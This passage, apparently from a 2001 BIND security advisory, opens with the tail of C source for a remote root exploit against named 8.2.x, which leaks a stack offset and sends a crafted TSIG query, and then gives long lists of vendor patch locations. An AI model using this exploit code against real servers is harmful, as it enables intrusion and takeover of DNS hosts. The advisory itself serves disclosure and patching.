*ptr++ = 0x00; /* Empty name */
PUTSHORT(0xfa, ptr); /* Type TSIG */
PUTSHORT(0xff, ptr); /* Class ANY */
bufflen = ptr - buff;
// dumpbuf(buff, bufflen);
return(bufflen);
}
long xtract_offset(char* buff, int len)
{
long ret;
/* Here be dragons. */
/* (But seriously, the values here depend on compilation options
* used for BIND.
*/
ret = *((long*)&buff[0x214]);
argevdisp1 = 0x080d7cd0;
argevdisp2 = *((long*)&buff[0x264]);
printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
argevdisp1, argevdisp2);
// dumpbuf(buff, len);
return(ret);
}
int main(int argc, char* argv[])
{
struct sockaddr_in sa;
int sock;
long address;
char buff[BUFFSIZE];
int len, i;
long offset;
socklen_t reclen;
unsigned char foo[4];
printf("[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n");
address = 0;
if (argc < 2)
{
printf("[*] usage : %s host\n", argv[0]);
return(-1);
}
if (!(address = resolve_host(argv[1])))
{
printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
return(-1);
} else {
memcpy(foo, &address, 4);
printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
}
sa.sin_family = AF_INET;
if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
{
return(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
sa.sin_addr.s_addr= address;
len = infoleak_qry(buff);
printf("[d] infoleak_qry was %d long\n", len);
len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (len < 0)
{
printf("[*] unable to send iquery\n");
return(-1);
}
reclen = sizeof(sa);
len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
if (len < 0)
{
printf("[x] unable to receive iquery answer\n");
return(-1);
}
printf("[*] iquery resp len = %d\n", len);
offset = xtract_offset(buff, len);
printf("[*] retrieved stack offset = %x\n", offset);
len = evil_query(buff, offset);
if(len < 0){
printf("[x] error sending tsig packet\n");
return(0);
}
sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (0 > close(sock))
{
return(-1);
}
connection(sa);
return(0);
}
SOLUTION
ISC has produced patches to address these issues. Except as
otherwise noted above, BIND version 4.9.8 and 8.2.3 resolve the
vulnerabilities described in this advisory. For ISC's description
of these problems:
http://www.isc.org/products/BIND/bind-security.html
To download updated versions of BIND:
ftp://ftp.isc.org/isc/bind/src/
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-devel-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/bind-utils-8.2.3-0.6.x_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/bind-8.2.3-0.6.x_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-devel-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/RPMS/bind-utils-8.2.3-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/7.0-beta/updates/SRPMS/bind-8.2.3-1_StackGuard.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/bind-8.2.3-1.3mdk.i586.rpm
6.0/RPMS/bind-devel-8.2.3-1.3mdk.i586.rpm
6.0/RPMS/bind-utils-8.2.3-1.3mdk.i586.rpm
6.0/SRPMS/bind-8.2.3-1.3mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
6.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
6.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
6.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/bind-8.2.3-1.2mdk.i586.rpm
7.0/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
7.0/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
7.0/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
7.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
7.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
7.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/bind-8.2.3-1.1mdk.i586.rpm
7.2/RPMS/bind-devel-8.2.3-1.1mdk.i586.rpm
7.2/RPMS/bind-utils-8.2.3-1.1mdk.i586.rpm
7.2/SRPMS/bind-8.2.3-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/bind-8.2.3-1.2mdk.i586.rpm
1.0.1/RPMS/bind-devel-8.2.3-1.2mdk.i586.rpm
1.0.1/RPMS/bind-utils-8.2.3-1.2mdk.i586.rpm
1.0.1/SRPMS/bind-8.2.3-1.2mdk.src.rpm
For SuSE Linux:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/bind8-8.2.3-92.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/bind8-8.2.3-92.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bind8-8.2.3-61.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/bind8-8.2.3-61.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/bind8-8.2.3-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bind8-8.2.3-39.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/bind8-8.2.3-39.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/bind8-8.2.3-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/bind8-8.2.3-0.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bind8-8.2.3-39.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/bind8-8.2.3-39.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/bind8-8.2.3-0.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/bind8-8.2.3-0.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-utils-8.2.3-1cl.i386.rpm
For Red Hat:
ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.3-0.5.x.src.rpm
ftp://updates.redhat.com/5.2/alpha/bind-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/i386/bind-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/sparc/bind-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/6.2/SRPMS/bind-8.2.3-0.6.x.src.rpm
ftp://updates.redhat.com/6.2/alpha/bind-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-devel-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-utils-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/i386/bind-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-devel-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-utils-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/sparc/bind-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-devel-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-utils-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/7.0/SRPMS/bind-8.2.3-1.src.rpm
ftp://updates.redhat.com/7.0/alpha/bind-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-devel-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-utils-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/i386/bind-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-devel-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-utils-8.2.3-1.i386.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.dsc
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/bind-dev_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/bind_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/dnsutils_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind-dev_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/dnsutils_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind-dev_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/dnsutils_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind-dev_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/dnsutils_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind-dev_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/dnsutils_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/bind-dev_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/bind_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/dnsutils_8.2.3-0.potato.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-all/bind-doc_8.2.3-0.potato.1_all.deb
http://security.debian.org/dists/stable/updates/main/binary-all/task-dns-server_8.2.3-0.potato.1_all.deb
For Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/n1/bind.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/bind.tgz
For FreeBSD:
http://www.freebsd.org/~kris/bind-8.2.3-4.x.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/bind-8.2.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/bind-8.2.3.tgz
For AIX:
AIX 4.3.3: IY16182
A temporary fix for AIX 4.3.3 systems is available. The temporary
fix can be downloaded via ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/multiple_bind_vulns_efix.tar.Z
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bind-8.2.3-1.i386.rpm
RPMS/bind-doc-8.2.3-1.i386.rpm
RPMS/bind-utils-8.2.3-1.i386.rpm
SRPMS/bind-8.2.3-1.src.rpm
For NetBSD, users may update their system source from the
appropriate release branch or NetBSD-current and rebuild BIND
(as well as other parts of the system). This method is
recommended for users of NetBSD-current and technically literate
users of the most recent releases on each branch (1.4.3 or 1.5).
Note that the NetBSD release branches contain accumulated changes
and bugfixes since the most recent release; these changes are
intended to improve the system, but have not yet been through the
complete release engineering cycle. Users who wish to remain at a
formal release should use the pkgsrc method instead. System
sources can be updated via anonymous CVS, SUP, or via download of
source tarfiles from the appropriate branch, collection or
directory:
Release   CVS branch   SUP collection   FTP directory
-------------------------------------------------------------------
1.4       netbsd-1-4   release-1-4      /pub/NetBSD/NetBSD-release-1-4
1.5       netbsd-1-5   release-1-5      /pub/NetBSD/NetBSD-release-1-4
current   HEAD         current          /pub/NetBSD/NetBSD-current
Systems running NetBSD-current dated from before 2001-01-28 should
be upgraded to NetBSD-current dated 2001-01-28 or later. For
NetBSD-current, see /usr/src/UPDATING for additional instructions,
as additional dependencies may need to be rebuilt before BIND.
Systems running either NetBSD-release* branch dated from before
2001-01-29 should be upgraded to 2001-01-29 or later.
For TurboLinux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-contrib-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-devel-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-utils-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/bind-8.2.3-2.src.rpm
For HP-UX:
11.00: PHNE_23274 (BIND 4.9.7)
11.00: * (BIND 8.1.2)
11.11: PHNE_23275 (BIND 8.1.2)
11.04: PHNE_22919 (BIND 4.9.7)
10.20: PHNE_23277 (BIND 4.9.7)
10.24: PHNE_23439 (BIND 4.9.7)
10.10: PHNE_23277 (BIND 4.9.7)
10.01: PHNE_23277 (BIND 4.9.7)
If you have upgraded HP-UX 11.00 BIND to 8.1.2 via the web
upgrade, you need to upgrade to the latest version of the BIND
package, 1.3, via the website.
For IRIX, install IRIX 6.5.12 when available, or patch 4193 for
IRIX 6.5 through 6.5.11.
OS Version     Vulnerable?   Patch #   Other Actions
----------     -----------   -------   -------------
IRIX 3.x       unknown                 Note 1
IRIX 4.x       unknown                 Note 1
IRIX 5.X       unknown                 Note 1
IRIX 6.0.x     unknown                 Note 1
IRIX 6.1       unknown                 Note 1
IRIX 6.2       unknown                 Note 1
IRIX 6.3       unknown                 Note 1
IRIX 6.4       unknown                 Note 1
IRIX 6.5       yes           4193      Note 2
IRIX 6.5.1     yes           4193      Note 2
IRIX 6.5.2     yes           4193      Note 2
IRIX 6.5.3     yes           4193      Note 2
IRIX 6.5.4     yes           4193      Note 2
IRIX 6.5.5     yes           4193      Note 2
IRIX 6.5.6     yes           4193      Note 2
IRIX 6.5.7     yes           4193      Note 2
IRIX 6.5.8     yes           4193      Note 2
IRIX 6.5.9     yes           4193      Note 2
IRIX 6.5.10    yes           4193      Note 2
IRIX 6.5.11    yes           4193      Note 3 & 4
IRIX 6.5.12    no                      Note 5
1) This version of the IRIX operating system has been retired.
Upgrade to an actively supported IRIX operating system. See
http://support.sgi.com/news/support/index.html#support_policy
for more information.
2) This version of the IRIX operating system is in maintenance
mode. Upgrade to an actively supported IRIX operating system. See
http://support.sgi.com/news/support/index.html#support_policy
for more information.
3) If you have not received an Overlay 11 CD for IRIX 6.5,
contact your SGI Support Provider.
4) Download the IRIX 6.5.11 Maintenance Release Stream from
http://support.sgi.com/colls/patches/tools/relstream/index.html
5) The IRIX 6.5.12 Maintenance Release Stream is scheduled to be
released in May 2001.